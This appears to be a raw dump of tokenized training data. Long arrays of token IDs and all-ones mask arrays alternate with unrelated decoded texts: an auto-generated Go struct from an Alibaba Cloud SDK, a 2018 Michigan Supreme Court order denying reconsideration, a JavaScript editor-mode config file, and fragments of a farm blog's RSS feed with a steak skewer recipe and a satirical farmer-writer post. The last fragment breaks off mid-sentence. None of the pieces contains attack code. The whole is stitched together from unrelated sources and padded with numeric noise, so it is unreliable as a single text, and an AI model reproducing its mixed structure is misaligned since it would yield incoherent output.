[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
package cloudcallcenter //Licensed under the Apache License, Version 2.0 (the "License"); //you may not use this file except in compliance with the License. //You may obtain a copy of the License at // //http://www.apache.org/licenses/LICENSE-2.0 // //Unless required by applicable law or agreed to in writing, software //distributed under the License is distributed on an "AS IS" BASIS, //WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. //See the License for the specific language governing permissions and //limitations under the License. // // Code generated by Alibaba Cloud SDK Code Generator. // Changes may cause incorrect behavior and will be lost if the code is regenerated. // PublicMedias is a nested struct in cloudcallcenter response type PublicMedias struct { PublicMedia []PublicMedia `json:"PublicMedia" xml:"PublicMedia"` }
[ 1, 3577, 9570, 4804, 5064, 13, 13, 458, 29931, 293, 21144, 1090, 278, 13380, 19245, 29892, 10079, 29871, 29906, 29889, 29900, 313, 1552, 376, 29931, 293, 1947, 1496, 13, 458, 6293, 1122, 451, 671, 445, 934, 5174, 297, 752, 13036, 411, 278, 19245, 29889, 13, 458, 3492, 1122, 4017, 263, 3509, 310, 278, 19245, 472, 13, 458, 13, 458, 1124, 597, 1636, 29889, 4288, 29889, 990, 29914, 506, 11259, 29914, 27888, 1430, 1660, 29899, 29906, 29889, 29900, 13, 458, 13, 458, 2525, 2222, 3734, 491, 22903, 4307, 470, 15502, 304, 297, 5007, 29892, 7047, 13, 458, 5721, 7541, 1090, 278, 19245, 338, 13235, 373, 385, 376, 3289, 8519, 29908, 350, 3289, 3235, 29892, 13, 458, 29956, 1806, 8187, 2692, 399, 1718, 29934, 13566, 29059, 6323, 8707, 29928, 22122, 29903, 8079, 13764, 29979, 476, 22255, 29892, 2845, 4653, 470, 2411, 2957, 29889, 13, 458, 13393, 278, 19245, 363, 278, 2702, 4086, 14765, 1076, 11239, 322, 13, 458, 13400, 800, 1090, 278, 19245, 29889, 13, 458, 13, 458, 5920, 5759, 491, 319, 1982, 5363, 14293, 12967, 5920, 3251, 1061, 29889, 13, 458, 678, 6916, 1122, 4556, 10240, 6030, 322, 674, 367, 5714, 565, 278, 775, 338, 1072, 759, 630, 29889, 13, 13, 458, 5236, 19302, 3173, 338, 263, 9322, 2281, 297, 9570, 4804, 5064, 2933, 13, 1853, 5236, 19302, 3173, 2281, 426, 13, 12, 19858, 10572, 5159, 19858, 10572, 421, 3126, 6160, 19858, 10572, 29908, 4903, 6160, 19858, 10572, 6937, 13, 29913, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Order Michigan Supreme Court Lansing, Michigan February 20, 2018 Stephen J. Markman, Chief Justice Brian K. Zahra Bridget M. McCormack 155126(33) David F. Viviano Richard H. Bernstein Kurtis T. Wilder Elizabeth T. Clement, PEOPLE OF THE STATE OF MICHIGAN, Justices Plaintiff-Appellee, v SC: 155126 COA: 334292 Wayne CC: 10-011337-FH NATALIE ERNESTINE FOSTER, Defendant-Appellant. _____________________________________/ On order of the Court, the motion for reconsideration of this Court’s October 31, 2017 order is considered, and it is DENIED, because it does not appear that the order was entered erroneously. I, Larry S. Royster, Clerk of the Michigan Supreme Court, certify that the foregoing is a true and complete copy of the order entered at the direction of the Court. February 20, 2018 a0209 Clerk
[ 1, 8170, 462, 462, 462, 462, 462, 308, 17098, 22569, 9245, 13, 462, 462, 462, 462, 462, 462, 1678, 365, 550, 292, 29892, 17098, 13, 13, 29871, 6339, 29871, 29906, 29900, 29892, 29871, 29906, 29900, 29896, 29947, 462, 462, 462, 462, 462, 268, 14317, 435, 29889, 4485, 1171, 29892, 13, 462, 462, 462, 462, 462, 462, 462, 29871, 14546, 17181, 13, 13, 462, 462, 462, 462, 462, 462, 632, 15733, 476, 29889, 796, 801, 336, 13, 462, 462, 462, 462, 462, 462, 268, 1771, 3690, 341, 29889, 15612, 555, 547, 13, 259, 29896, 29945, 29945, 29896, 29906, 29953, 29898, 29941, 29941, 29897, 462, 462, 462, 462, 462, 1669, 4699, 383, 29889, 26089, 3328, 13, 462, 462, 462, 462, 462, 462, 539, 6123, 379, 29889, 6209, 5465, 13, 462, 462, 462, 462, 462, 462, 9651, 22478, 275, 323, 29889, 399, 2700, 13, 462, 462, 462, 462, 462, 462, 418, 13061, 323, 29889, 26769, 29892, 13, 29871, 349, 29923, 4590, 1307, 8079, 6093, 6850, 3040, 8079, 341, 2965, 29950, 6259, 2190, 29892, 462, 462, 462, 462, 462, 268, 3387, 1575, 13, 9651, 13494, 524, 2593, 29899, 2052, 1808, 29872, 29892, 13, 29871, 325, 462, 462, 462, 462, 29871, 12314, 29901, 29871, 29896, 29945, 29945, 29896, 29906, 29953, 13, 462, 462, 462, 462, 268, 4810, 29909, 29901, 29871, 29941, 29941, 29946, 29906, 29929, 29906, 13, 462, 462, 462, 462, 268, 25843, 19178, 29901, 29871, 29896, 29900, 29899, 29900, 29896, 29896, 29941, 29941, 29955, 29899, 29943, 29950, 13, 29871, 26038, 1964, 8673, 8982, 8186, 1254, 8895, 383, 3718, 1001, 29892, 13, 9651, 5282, 5818, 29899, 2052, 514, 424, 29889, 13, 13, 29871, 903, 27097, 27097, 7652, 29914, 13, 13, 308, 1551, 1797, 310, 278, 9245, 29892, 278, 10884, 363, 337, 3200, 1241, 362, 310, 445, 9245, 30010, 29879, 5533, 29871, 29941, 29896, 29892, 13, 259, 29906, 29900, 29896, 29955, 1797, 338, 5545, 29892, 322, 372, 338, 360, 1430, 29902, 3352, 29892, 1363, 372, 947, 451, 2615, 393, 278, 1797, 471, 13, 29871, 7802, 4589, 650, 5794, 29889, 13, 13, 13, 13, 13, 462, 9651, 306, 29892, 26977, 317, 29889, 1528, 858, 261, 29892, 315, 1358, 29895, 310, 278, 17098, 22569, 9245, 29892, 2284, 1598, 393, 278, 13, 462, 418, 363, 2412, 292, 338, 263, 1565, 322, 4866, 3509, 310, 278, 1797, 7802, 472, 278, 5305, 310, 278, 9245, 29889, 13, 462, 9651, 6339, 29871, 29906, 29900, 29892, 29871, 29906, 29900, 29896, 29947, 13, 308, 263, 29900, 29906, 29900, 29929, 13, 462, 462, 462, 462, 18884, 315, 1358, 29895, 13, 15 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
/** * @fileoverview Editor mode config for the Coding with Chrome editor. * * @license Copyright 2015 The Coding with Chrome Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * @author mbordihn@google.com (Markus Bordihn) */ goog.provide('cwc.mode.Config'); goog.require('cwc.mode.ConfigData'); /** * @constructor * @final */ cwc.mode.Config = function() {}; /** * @param {!cwc.mode.Type} type * @return {Object} */ cwc.mode.Config.get = function(type) { if (!type) { console.warn('Mode type is undefined!'); return null; } if (type in cwc.mode.ConfigData) { return cwc.mode.ConfigData[type]; } else { throw new Error('Required Mode config for ' + type + ' is not defined !'); } }; /** * @param {!cwc.mode.Type} modeType * @return {string} */ cwc.mode.Config.getMode = function(modeType) { if (cwc.mode.Config.get(modeType)) { return modeType; } return ''; }; /** * @param {string} mimeType * @return {string} */ cwc.mode.Config.getModeByMimeType = function(mimeType) { for (let mod in cwc.mode.ConfigData) { if (Object.prototype.hasOwnProperty.call(cwc.mode.ConfigData, mod)) { let modConfig = cwc.mode.ConfigData[mod]; if (modConfig.mimeTypes.indexOf(mimeType) !== -1) { return mod; } } } return ''; };
[ 1, 7762, 13, 334, 732, 1445, 957, 1493, 14059, 4464, 2295, 363, 278, 315, 3689, 411, 10228, 6920, 29889, 13, 334, 13, 334, 732, 506, 1947, 14187, 1266, 29871, 29906, 29900, 29896, 29945, 450, 315, 3689, 411, 10228, 13189, 943, 29889, 13, 334, 13, 334, 10413, 21144, 1090, 278, 13380, 19245, 29892, 10079, 29871, 29906, 29889, 29900, 313, 1552, 376, 29931, 293, 1947, 1496, 13, 334, 366, 1122, 451, 671, 445, 934, 5174, 297, 752, 13036, 411, 278, 19245, 29889, 13, 334, 887, 1122, 4017, 263, 3509, 310, 278, 19245, 472, 13, 334, 13, 334, 259, 1732, 597, 1636, 29889, 4288, 29889, 990, 29914, 506, 11259, 29914, 27888, 1430, 1660, 29899, 29906, 29889, 29900, 13, 334, 13, 334, 25870, 3734, 491, 22903, 4307, 470, 15502, 304, 297, 5007, 29892, 7047, 13, 334, 13235, 1090, 278, 19245, 338, 13235, 373, 385, 376, 3289, 8519, 29908, 350, 3289, 3235, 29892, 13, 334, 399, 1806, 8187, 2692, 399, 1718, 29934, 13566, 29059, 6323, 8707, 29928, 22122, 29903, 8079, 13764, 29979, 476, 22255, 29892, 2845, 4653, 470, 2411, 2957, 29889, 13, 334, 2823, 278, 19245, 363, 278, 2702, 4086, 14765, 1076, 11239, 322, 13, 334, 27028, 1090, 278, 19245, 29889, 13, 334, 13, 334, 732, 8921, 286, 29890, 536, 29875, 3123, 29992, 3608, 29889, 510, 313, 9802, 375, 350, 536, 29875, 3123, 29897, 13, 3776, 13, 1484, 468, 29889, 16123, 680, 877, 29883, 29893, 29883, 29889, 8513, 29889, 3991, 2157, 13, 13, 1484, 468, 29889, 12277, 877, 29883, 29893, 29883, 29889, 8513, 29889, 3991, 1469, 2157, 13, 13, 13, 7918, 13, 334, 732, 27821, 13, 334, 732, 8394, 13, 3776, 13, 29883, 29893, 29883, 29889, 8513, 29889, 3991, 353, 740, 580, 15739, 13, 13, 13, 7918, 13, 334, 732, 3207, 426, 29991, 29883, 29893, 29883, 29889, 8513, 29889, 1542, 29913, 1134, 13, 334, 732, 2457, 426, 2061, 29913, 13, 3776, 13, 29883, 29893, 29883, 29889, 8513, 29889, 3991, 29889, 657, 353, 740, 29898, 1853, 29897, 426, 13, 29871, 565, 5384, 1853, 29897, 426, 13, 1678, 2991, 29889, 25442, 877, 6818, 1134, 338, 7580, 29991, 2157, 13, 1678, 736, 1870, 29936, 13, 29871, 500, 13, 29871, 565, 313, 1853, 297, 274, 29893, 29883, 29889, 8513, 29889, 3991, 1469, 29897, 426, 13, 1678, 736, 274, 29893, 29883, 29889, 8513, 29889, 3991, 1469, 29961, 1853, 1385, 13, 29871, 500, 1683, 426, 13, 1678, 3183, 716, 4829, 877, 19347, 21864, 2295, 363, 525, 718, 1134, 718, 525, 338, 451, 3342, 1738, 2157, 13, 29871, 500, 13, 3400, 13, 13, 13, 7918, 13, 334, 732, 3207, 426, 29991, 29883, 29893, 29883, 29889, 8513, 29889, 1542, 29913, 4464, 1542, 13, 334, 732, 2457, 426, 1807, 29913, 13, 3776, 13, 29883, 29893, 29883, 29889, 8513, 29889, 3991, 29889, 657, 6818, 353, 740, 29898, 8513, 1542, 29897, 426, 13, 29871, 565, 313, 29883, 29893, 29883, 29889, 8513, 29889, 3991, 29889, 657, 29898, 8513, 1542, 876, 426, 13, 1678, 736, 4464, 1542, 29936, 13, 29871, 500, 13, 29871, 736, 18231, 13, 3400, 13, 13, 13, 7918, 13, 334, 732, 3207, 426, 1807, 29913, 286, 603, 1542, 13, 334, 732, 2457, 426, 1807, 29913, 13, 3776, 13, 29883, 29893, 29883, 29889, 8513, 29889, 3991, 29889, 657, 6818, 2059, 29924, 603, 1542, 353, 740, 29898, 29885, 603, 1542, 29897, 426, 13, 29871, 363, 313, 1026, 878, 297, 274, 29893, 29883, 29889, 8513, 29889, 3991, 1469, 29897, 426, 13, 1678, 565, 313, 2061, 29889, 16309, 29889, 5349, 29949, 1233, 4854, 29889, 4804, 29898, 29883, 29893, 29883, 29889, 8513, 29889, 3991, 1469, 29892, 878, 876, 426, 13, 418, 1235, 878, 3991, 353, 274, 29893, 29883, 29889, 8513, 29889, 3991, 1469, 29961, 1545, 1385, 13, 418, 565, 313, 1545, 3991, 29889, 29885, 603, 10562, 29889, 19402, 29898, 29885, 603, 1542, 29897, 15639, 448, 29896, 29897, 426, 13, 4706, 736, 878, 29936, 13, 418, 500, 13, 1678, 500, 13, 29871, 500, 13, 29871, 736, 18231, 13, 3400, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Late summer. It’s hot, it’s busy with vacations, wrangling the garden, social engagements, maybe even work. You need something easy to grill! We sell handy, one pound packages of our beef kebab/skewer cubes, ready to be marinated and spiked for easy cooking. They’re tender and evenly cut, each package meant to be enough for two servings. So! Round yourself up some excellent veg from your favorite local farm and get cooking! We used small potatoes, spring onions, zucchini/summer squash and bell pepper. The gas grill used here is known to be hotter in the back and cooler in the front, so these skewers are balanced accordingly with sturdier veg like onions on the hotter area and peppers on the cooler. Know your grill. Process all marinade ingredients in a food processor or blender until smooth. Or chop very fine and shake like heck in a mason jar! I used the small food processor attachment on my immersion blender. Place marinade and beef cubes in a bowl that has a lid, toss with a spoon or spatula to coat. Refrigerate at least 1-2 hours, tossing a couple times. Chop all your vegetables as you like them for skewers- See photos for reference but think two-bite sized chunks. Halve the zucchini, then slice in 1 inch pieces. Quarter onions. Toss in a separate bowl with olive oil, freshly ground pepper and salt to taste. Let steep about 30 min. Take beef out of the fridge and thread onto skewers, fairly snuggly spaced (again, see photos for reference). Try to swipe up some of the marinade as you take them out of the bowl. Keep the skewers on a plate to take to the grill and let them come to room temperature. Reserve the extra marinade! Repeat skewering process with vegetables on separate skewers. Heat up the grill! Oil the grate. Make yourself hot and medium zones however is appropriate for your gas/charcoal grill. Pour remaining marinade into a cast iron or other pan on the stovetop and cook down into a gravy. Pour into a gravy boat or pitcher to pass around the table with the meal. Place beef over the hotter area of your grill. Place vegetable skewers in the cooler zone. Cook, turning every 4 minutes until beef registers 120 degrees F for medium rare (our recommendation), about ten minutes. Remove beef from the grill and tent with foil. Continue cooking veg for 5 min more or until done. Slide the beef and veg off their respective skewers back into clean bowls and distribute to plates, or serve on the skewers! ]]>http://smithmeadows.com/kitchen/easy-marinated-steak-skewers/feed/018453http://smithmeadows.com/kitchen/easy-marinated-steak-skewers/The Rich & Glamorous Life of the Farmer-Writerhttp://feedproxy.google.com/~r/smithmeadows/~3/RxH_SKg9Ar8/ http://smithmeadows.com/farm/rich-glamorous-life-farmer-writer/#commentsSun, 26 Mar 2017 23:42:37 +0000http://new.smithmeadows.com/?p=6425It's widely known that farming is a lucrative occupation, typically reserved for jet-setters, celebrities, and the crustiest of the upper-crust. Think about it. Dollar bills are 75% cotton & 25% linen; money doesn't grow on trees, but it does grow straight out of the ground. Why worry about droughts when you can "make it rain" [...] ]]>It’s widely known that farming is a lucrative occupation, typically reserved for jet-setters, celebrities, and the crustiest of the upper-crust. Think about it. Dollar bills are 75% cotton & 25% linen; money doesn’t grow on trees, but it does grow straight out of the ground. Why worry about droughts when you can “make it rain” whenever you want? Some people think you have to be lucky to be a farmer, but here’s an insider tip: you can quadruple your luck if you raise horses (4 horseshoes) or rabbits (4… well, you know). An added bonus, there are four-leaf clovers all over the pasture for free! No one can argue that farmers have it made. Why is there a stunt chicken on my head? Don’t ask me, ask wardrobe. Of course, everyone agrees the only thing more profitable than farming is writing. Overwhelmed by sheer demand, universities have recently limited the number of students allowed to be English majors. After all, with all the public funding for the arts, how could a writer not make millions? Consider your local poets, driving around town in their fancy convertibles, flamboyantly slamming poetry whenever they damn-well please. But try not to be jealous. As the old saying goes, “Don’t Hate the Playwright, Hate the Game.” By now, I know what you’re probably thinking: “Wow! The only thing more glamorous than being a farmer or a writer must be combining the two!” Correct you’d be. And this epiphany might lead you to a logical conclusion: “If only I was lucky enough to have a glimpse into this rich and fabulous world, my boring life would change forever!” Fret not, hoi polloi. This farmer-writer has your back (noblesse oblige and whatnot). I was reminded of my elite social status recently when I received a gift in the mail (btw, receiving gifts is the sort of thing that happens to farmer-writers all the time!) from the website OnPasture.com, containing an exclusive writers’ jacket: #legit As mentioned, this gift came from On Pasture, a website where farmer-writers like myself congregate to share insights into making even more money, and being even more glamorous than we already are. (I know, hard to believe… but remember, this is insider access!). More specifically, we discuss ways to do this while raising animals sustainably ‘on pasture’. If you read between the lines, you can probably infer what I’m actually talking about here: GOLD. You know, like hatching geese that lay golden eggs, flocks of sheep with golden fleeces, grabbing bulls by their golden horns, etc., etc. Naturally, due to my demanding social schedule, I sometimes forget how websites like this can help the less fortunate. Well, here’s a solid-gold tip for you: THE ON PASTURE WEBSITE IS TOTALLY FREE! That’s right, all you have to do is click the link, and it will whisk you away to lifestyles of the affluent and fabulous. To give you a sense of what you’ll find, here’s a photo-essay of me in my author jacket–looking fabulous, natch–and writing about the topics covered ‘on’ On Pasture. Taking a six inch soil sample. That core looks almost as good as me! Writing on a compost pile. Brown gold, Jerry! All about sheep. Looking good in my On Pasture author jacket, even from behind! Managing my farming-writing money all at once… It requires both hands! Writing on a barn. Celebrities like to get high. Up close with farm implements. Get the point? On a tractor. That mud detailing cost $5,000, but I was all like ‘honey badger don’t care.’ How about me writing on a hay bale? Far out! Here I am writing about pigs. That’s all, just writing about pigs. About clean water… The takeaway is pretty clear. Me & my entourage. Gotta know your global markets. Here, I’m at the farmers’ market. And finally, this is me with a goose, a 19th century corn sheller, and a beat-up old hog drinker. Helllllloooo, ladies. As you can see, the life of the farmer-writer is an exclusive journey filled with riches, glamour, and exotic locales. But don’t take my word for it, subscribe for free to On Pasture. Gotta run, I’m meeting Sir Elton John in Spain, I’m traveling tonight on a plane. And for even more stories about stinking rich farmer-writers, check out my books below: ]]>http://smithmeadows.com/farm/rich-glamorous-life-farmer-writer/feed/36425http://smithmeadows.com/farm/rich-glamorous-life-farmer-writer/Lamb and Root Stewhttp://feedproxy.google.com/~r/smithmeadows/~3/q1uAAUsPoXU/ http://smithmeadows.com/kitchen/lamb-root-stew/#respondFri, 17 Mar 2017 22:14:32 +0000http://new.smithmeadows.com/?p=6378Finally, it's starting to feel like spring! March came through like a somewhat confused lion, so it's only appropriate we celebrate the last chilly evenings with lamb. There are all kinds of things you can do with lamb, vegetables and little time, so consider this recipe a helpful baseline for future experimentation. I started by reading Alice [...] Finally, it’s starting to feel like spring! March came through like a somewhat confused lion, so it’s only appropriate we celebrate the last chilly evenings with lamb. There are all kinds of things you can do with lamb, 